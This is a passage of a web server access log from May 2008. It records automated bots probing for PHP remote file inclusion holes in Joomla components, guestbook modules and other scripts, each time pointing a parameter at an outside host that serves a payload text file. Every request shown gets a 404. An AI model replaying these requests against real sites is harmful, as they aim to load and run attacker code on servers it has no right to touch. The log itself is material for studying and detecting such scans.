195.54.9.218 - - [04/May/2008:20:44:44 -0600] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 228 "-" "libwww-perl/5.803"
195.54.9.218 - - [04/May/2008:20:44:44 -0600] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 228 "-" "libwww-perl/5.803"
69.16.230.56 - - [04/May/2008:20:45:16 -0600] "GET /logs/scanhttp://www.snd.fr/upload/rador.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.808"
69.16.230.56 - - [04/May/2008:20:45:16 -0600] "GET /scanhttp://www.snd.fr/upload/rador.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.808"
200.6.155.217 - - [04/May/2008:20:45:21 -0600] "GET /logs/scanhttp://www.snd.fr/upload/rador.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.810"
200.6.155.217 - - [04/May/2008:20:45:21 -0600] "GET /scanhttp://www.snd.fr/upload/rador.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.810"
213.149.32.24 - - [04/May/2008:20:45:25 -0600] "GET /logs/access_log.20080406/myevent.php?myevent_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
195.219.133.78 - - [04/May/2008:20:45:33 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
195.219.133.78 - - [04/May/2008:20:45:33 -0600] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
85.19.150.85 - - [04/May/2008:20:46:10 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
85.19.150.85 - - [04/May/2008:20:46:10 -0600] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
200.6.155.217 - - [04/May/2008:20:46:14 -0600] "GET /logs/scanhttp://www.snd.fr/upload/rador.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.810"
200.6.155.217 - - [04/May/2008:20:46:14 -0600] "GET /scanhttp://www.snd.fr/upload/rador.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.810"
85.19.150.85 - - [04/May/2008:20:48:02 -0600] "GET /logs/myevent.php?myevent_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
85.19.150.85 - - [04/May/2008:20:48:02 -0600] "GET /myevent.php?myevent_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 229 "-" "libwww-perl/5.805"
85.19.150.85 - - [04/May/2008:20:48:08 -0600] "GET /logs/access_log.20080413/myevent.php?myevent_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
85.19.150.85 - - [04/May/2008:20:48:09 -0600] "GET /myevent.php?myevent_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 229 "-" "libwww-perl/5.805"
85.19.150.85 - - [04/May/2008:20:48:09 -0600] "GET /logs/myevent.php?myevent_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
85.19.150.85 - - [04/May/2008:20:48:48 -0600] "GET /logs/access_log.20080406/myevent.php?myevent_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
195.12.53.176 - - [04/May/2008:20:48:56 -0600] "GET /logs/error_log.20080330//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
195.12.53.176 - - [04/May/2008:20:49:05 -0600] "GET /logs/error_log.20080330//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
200.6.155.217 - - [04/May/2008:20:50:57 -0600] "GET /logs/error_log.20080406//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.snd.fr/upload/rador.txt?? HTTP/1.1" 404 279 "-" "libwww-perl/5.810"
200.6.155.217 - - [04/May/2008:20:50:57 -0600] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.snd.fr/upload/rador.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.810"
200.6.155.217 - - [04/May/2008:20:50:57 -0600] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.snd.fr/upload/rador.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.810"
200.6.155.217 - - [04/May/2008:20:50:59 -0600] "GET /logs/error_log.20080406//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.snd.fr/upload/rador.txt?? HTTP/1.1" 404 279 "-" "libwww-perl/5.810"
200.6.155.217 - - [04/May/2008:20:50:59 -0600] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.snd.fr/upload/rador.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.810"
200.6.155.217 - - [04/May/2008:20:50:59 -0600] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.snd.fr/upload/rador.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.810"
200.160.251.134 - - [04/May/2008:20:51:44 -0600] "GET /logs/error_log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 270 "-" "libwww-perl/5.805"
200.160.251.134 - - [04/May/2008:20:51:45 -0600] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
200.160.251.134 - - [04/May/2008:20:51:45 -0600] "GET /logs/error_log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.805"
200.160.251.134 - - [04/May/2008:20:51:45 -0600] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://h4x0rs.site88.ne